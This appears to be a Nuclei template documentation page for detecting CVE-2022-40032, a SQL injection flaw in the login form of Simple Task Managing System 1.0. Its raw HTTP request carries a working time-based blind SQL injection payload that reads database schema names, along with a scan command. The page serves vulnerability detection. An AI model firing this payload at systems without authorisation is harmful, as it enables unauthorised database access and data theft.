Skip to content
Nuclei Templates

Simple Task Managing System v1.0 - SQL Injection

ID: CVE-2022-40032

Severity: critical

Author: r3Y3r53

Tags: time-based-sqli,cve,cve2022,packetstorm,simple-task,stms,sqli,simple_task_managing_system_project

Description

Section titled “Description”

SQL injection occurs when a web application doesn’t properly validate or sanitize user input that is used in SQL queries. Attackers can exploit this by injecting malicious SQL code into the input fields of a web application, tricking the application into executing unintended database queries.

YAML Source

Section titled “YAML Source”
id: CVE-2022-40032


info:
  name: Simple Task Managing System v1.0 - SQL Injection
  author: r3Y3r53
  severity: critical
  description: |
    SQL injection occurs when a web application doesn't properly validate or sanitize user input that is used in SQL queries. Attackers can exploit this by injecting malicious SQL code into the input fields of a web application, tricking the application into executing unintended database queries.
  reference:
    - https://www.exploit-db.com/exploits/51273
    - https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40032
    - http://packetstormsecurity.com/files/171739/Simple-Task-Managing-System-1.0-SQL-Injection.html
    - https://www.sourcecodester.com/sites/default/files/download/razormist/Task%20Managing%20System%20in%20PHP.zip
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-40032
    cwe-id: CWE-89
    epss-score: 0.00392
    epss-percentile: 0.73276
    cpe: cpe:2.3:a:simple_task_managing_system_project:simple_task_managing_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: simple_task_managing_system_project
    product: simple_task_managing_system
  tags: time-based-sqli,cve,cve2022,packetstorm,simple-task,stms,sqli,simple_task_managing_system_project


http:
  - raw:
      - |
        @timeout: 30s
        POST /task/loginValidation.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        login=test'%20AND%20(SELECT%208979%20FROM%20(SELECT(SLEEP(10-(IF(ORD(MID((SELECT%20DISTINCT(IFNULL(CAST(schema_name%20AS%20NCHAR)%2c0x20))%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%200%2c1)%2c12%2c1))%3e48%2c0%2c1)))))jaXJ)--%20HgKq&password=


    matchers:
      - type: dsl
        dsl:
          - 'duration>=10'
          - 'status_code == 302'
          - "contains(location, 'login.php')"
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 4a0a004730450221008166e72597601075a32e0a9f117ac5cb30b6514fbb1069c4c94cd6c99ca5f92002203a17d4dffb0c5d76db1668bc280442a461a60ea729da8be50bc646f66815383d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-40032.yaml"

View on Github